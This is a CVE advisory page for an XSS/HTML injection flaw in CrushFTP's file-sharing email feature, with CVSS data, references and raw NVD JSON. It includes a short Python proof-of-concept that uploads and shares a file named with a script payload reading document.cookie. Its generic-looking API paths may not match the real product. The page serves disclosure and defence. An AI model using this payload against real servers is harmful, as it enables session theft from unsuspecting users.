CVE-2025-63419

Description

Cross Site Scripting (XSS) vulnerability in CrushFTP 11.3.6_48. The Web-Based Server has a feature where users can share files, the feature reflects the filename to an emailbody field with no sanitations leading to HTML Injection.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* - VULNERABLE

CrushFTP 11.3.6_48

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import urllib.parse # CVE-2025-63419 PoC - Stored XSS in CrushFTP File Sharing # Target: CrushFTP 11.3.6_48 target_url = "http://target-server:8080/" # Malicious filename containing XSS payload malicious_filename = '<script>alert(document.cookie)</script>' # Step 1: Authenticate to CrushFTP login_data = { "username": "attacker", "password": "password123" } session = requests.Session() login_resp = session.post(f"{target_url}api/login", data=login_data) # Step 2: Upload file with malicious filename files = { "file": (malicious_filename, b"test content", "application/octet-stream") } upload_resp = session.post(f"{target_url}api/upload", files=files) # Step 3: Share the file via email (triggers XSS in email body) share_data = { "filename": malicious_filename, "recipient_email": "[email protected]", "message": "Please check this file" } share_resp = session.post(f"{target_url}api/share", data=share_data) print(f"XSS payload sent: {urllib.parse.quote(malicious_filename)}") print(f"Response: {share_resp.status_code}") # When victim views the email notification, XSS executes

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63419
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63419
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63419/
[4] VulDB https://vuldb.com/cve/CVE-2025-63419
[5] https://gist.github.com/MMAKINGDOM/39ded58b1e6d2d19366e76e0d5b1c851
[6] https://github.com/MMAKINGDOM/CVE-2025-63419/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63419", "sourceIdentifier": "[email protected]", "published": "2025-11-12T17:15:38.710", "lastModified": "2025-12-31T16:34:12.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting (XSS) vulnerability in CrushFTP 11.3.6_48. The Web-Based Server has a feature where users can share files, the feature reflects the filename to an emailbody field with no sanitations leading to HTML Injection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*", "versionEndExcluding": "11.3.7_60", "matchCriteriaId": "01E11F0D-2898-4CE5-AFE5-1281DF834BBA"}]}]}], "references": [{"url": "https://gist.github.com/MMAKINGDOM/39ded58b1e6d2d19366e76e0d5b1c851", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/MMAKINGDOM/CVE-2025-63419/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}